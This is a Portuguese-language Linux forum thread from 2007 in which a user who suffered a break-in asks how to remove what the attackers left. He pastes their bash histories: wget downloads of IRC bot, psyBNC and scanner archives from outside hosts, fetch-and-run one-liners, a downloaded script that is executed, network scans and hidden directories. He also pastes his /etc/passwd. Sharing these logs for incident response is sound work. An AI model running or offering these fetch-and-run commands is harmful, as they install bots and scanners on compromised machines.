Processos indesejados e usuários desconhecidos

Iniciado por leandromdelima, 20 de Julho de 2007, 13:10

tópico anterior - próximo tópico
Imprimir
Ir para Fim Páginas1
Ações

leandromdelima

20 de Julho de 2007, 13:10
Salve!  Ontem identifiquei um acesso não autorizado na minha máquina.  Tenho instalado uma base Oracle Xe e também uma MySQL para testes aqui e acabei deixando ambos usuários com as senhas respectivamente iguais aos logins.  Uma olhada no histórico do bash de cada um :

MYSQL:

Código Selecionar

w
passwd
moaramamaita
w
passwd
uname -a
ps x
w
cat /proc/cpuinfo
cat /etc/hosts
/sbin/ifconfig|grep inet
cd /var/tmp
ls
mkdir " "
cd " "
mkdir ". "
cd ". "
wget 16
wget http://shockingsoft.uv.ro/stuffs/boti-linux.tar.gz
passwd
w
ps x
cd /var/tmp
ls
cd " "
cd ". "
name -a
uname -a
ls
tar zxvf boti-linux.tar.gz
rm -rf boti-linux.tar.gz
ls
cd bots
ls
chmod +x *
cd randfiles
chmod +x *
cd ..
ls
vi kswap.set
vi mech1.users
vi mech2.users
vi mech3.users
export PATH=:$PATH
inetd
cd ..
ls
wget trades.ws43.com/scan/unixcod.tar.gz
tar zxvf unixcod.tar.gz
rm -rf unixcod.tar.gz
ls
cd unixcod
ls
./unix 200.1
./unix 200.10
./unix 200.113
./unix 200.24
w
passwd
uname -a
ps x
ps -aux
w
cd /var/tmp
ls
cd kdecache-root
ls
cd kdecache-leandro
ls -a
cd .oracle
ls
ls -a
cd ..
rm -rf .oracle
cd " "
cd ". "
ls
cd bots
ls
export PATH=:$PATH
inetd
uname -a
w
passwd
passwd mysql
ps x
ls
cd /var/tmp
ls -a
cd .oracle
ls -a
cd ..
rm -rf .oracle
wget http://www.localhost.home.ro/httpd.tar.gz
wget  http://shockingsoft.uv.ro/stuffs/psybnc-no-ssl-linux.tar.gz
tar zxvf psybnc-no-ssl-linux.tar.gz
rm -rf psybnc-no-ssl-linux.tar.gz
ls
uname -a
cd psybnc
ls
./psyport 2006
./psybnc
cat /proc/cpuinfo
cat /etc/hosts
/sbin/ifconfig|grep inet
w
ps x
cd /var/tmp
ls
cd psybnc
ls
./psybnc


ORACLE:

Código Selecionar

w
cat /proc/cpuinfo
ls -a
uname -a
cd /var/tmp
wget http://download.microsoft.com/download/1/b/c/1bc0b1a3-c839-4b36-8f3c-19847ba09299/MPSetup.exe
passwd
wget http://catalisef.php0h.com/Catali.tgz;tar zxvf Catali.tgz;rm -rf Catali.tgz;cd fast;./start 59
id
exit
w
cd /var/tmp
ls -a
uname -a
wget members.lycos.co.uk/gambits/s4.sh;chmod +x s4.sh;./s4.sh
ls -a
cd fast
./start 59
exit


Dei uma pesquisada pelos arquivos acima, dei uma olhada nos scripts, verifiquei os diretórios que eles criaram e acessaram e me parece que não causaram nenhum estrago ou utilizaram nenhuma falha de segurança.  O MySQL rodou alguns bots de mirc, pelo que me parece, e o Oracle executou um port scan.

Alterei a senha de ambos e fico constantemente monitorando os usuários logados.  Mas agora fiquei com a pulga atrás da orelha:  Como elemino os bots e processos deixados por eles de forma completa?  Dei uma olhada também no arquivo passwd e vi que existem uma penca de usuários que não sei pra que servem, mas não tenho certeza se são usuários do sistema.

Código Selecionar

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:101:101::/nonexistent:/bin/false
syslog:x:102:102::/home/syslog:/bin/false
klog:x:103:103::/home/klog:/bin/false
cupsys:x:100:106::/home/cupsys:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
haldaemon:x:108:108:Hardware abstraction layer,,,:/var/run/hal:/bin/false
hplip:x:105:7:HPLIP system user,,,:/var/run/hplip:/bin/false
leandro:x:1000:1000:leandro,,,:/home/leandro:/bin/bash
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
ftp:x:109:65534::/home/ftp:/bin/false
proftpd:x:110:65534:,,,,:/var/run/proftpd:/bin/false
gdm:x:106:111:Gnome Display Manager,,,,:/var/lib/gdm:/bin/false
oracle:x:1003:1003:,,,,:/usr/lib/oracle/xe:/bin/bash


Utilizei o chrootkit, mas aparentemente está tudo normal, não acusou nada de mais.  Alguém tem alguma sugestão sobre como fazer uma limpeza geral?
Quando eu avançar, avancem comigo.  Se eu parar, me empurrem para frente.  Se eu der meia volta, matem-me.

clcampos

#1
20 de Julho de 2007, 13:27
São usuários do sistema sim, e deletá-los causará problemas sérios no seu sistema.
Cristiano/Timóteo - MG
.: Como Fazer Perguntas de Forma Inteligente :.                
Com dúvida? pesquise!
Imprimir
Ir para Topo Páginas1
Ações